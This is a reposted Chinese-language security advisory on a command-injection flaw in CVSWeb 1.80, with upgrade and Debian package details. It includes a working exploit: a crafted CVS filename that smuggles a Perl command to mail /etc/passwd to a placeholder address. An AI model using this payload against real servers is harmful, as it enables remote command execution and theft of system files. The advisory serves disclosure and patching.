CVSWeb遠(yuǎn)程攻擊漏洞精簡(jiǎn)版
此文章主要講述的是CVSWeb遠(yuǎn)程攻擊漏洞,我前兩天在相關(guān)網(wǎng)站看見(jiàn)CVSWeb遠(yuǎn)程攻擊漏洞的資料,覺(jué)得挺好,就拿出來(lái)供大家分享,以下就是文章的詳細(xì)內(nèi)容介紹,希望會(huì)給你帶來(lái)一些幫助在此方面。
受影響系統(tǒng):
CVSWeb Developer CVSWeb 1.80
不受影響系統(tǒng):
CVSWeb Developer CVSWeb 1.89
CVSWeb Developer CVSWeb 1.86
描述:
Cvsweb 1.80包含一個(gè)安全遠(yuǎn)程攻擊漏洞,如果攻擊者對(duì)cvs庫(kù)有寫權(quán)限,他就可以遠(yuǎn)程獲得對(duì)cvs server的
shell訪問(wèn)權(quán)限。出問(wèn)題的代碼在cvsweb.cgi中:
open($fh, "rlog '$filenames' 2>/dev/null |")
攻擊者通過(guò)建立一個(gè)特殊的文件名,來(lái)發(fā)動(dòng)攻擊。
<* 來(lái)源: Wizdumb *>
測(cè)試方法:
警 告
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)!
攻擊者會(huì)首先按照下列步驟操作:
SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m '' $SHELLCODE
然后攻擊者會(huì)訪問(wèn)cvsweb頁(yè)面,瀏覽他設(shè)置木馬文件的目錄。這將導(dǎo)致/etc/passwd 文件被
發(fā)送給攻擊者,當(dāng)然攻擊者也可以執(zhí)行其他的命令。
建議:
升級(jí)到1.86或者更高版本,下載地址:
http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/
[ Debian Linux ]
Debian GNU/Linux 2.1 alias slink
源碼包:
http://security.debian.org/dists/stable/updates/source/cvsweb_109.dsc
MD5 checksum: b1810728310882fb72078674521ee369
http://security.debian.org/dists/stable/updates/source/cvsweb_109.tar.gz
MD5 checksum: 4c42ec3ba7248fc2499cdfaa6ae6b702
以上的相關(guān)內(nèi)容就是對(duì)CVSWeb遠(yuǎn)程攻擊漏洞的介紹,望你能有所收獲。
【編輯推薦】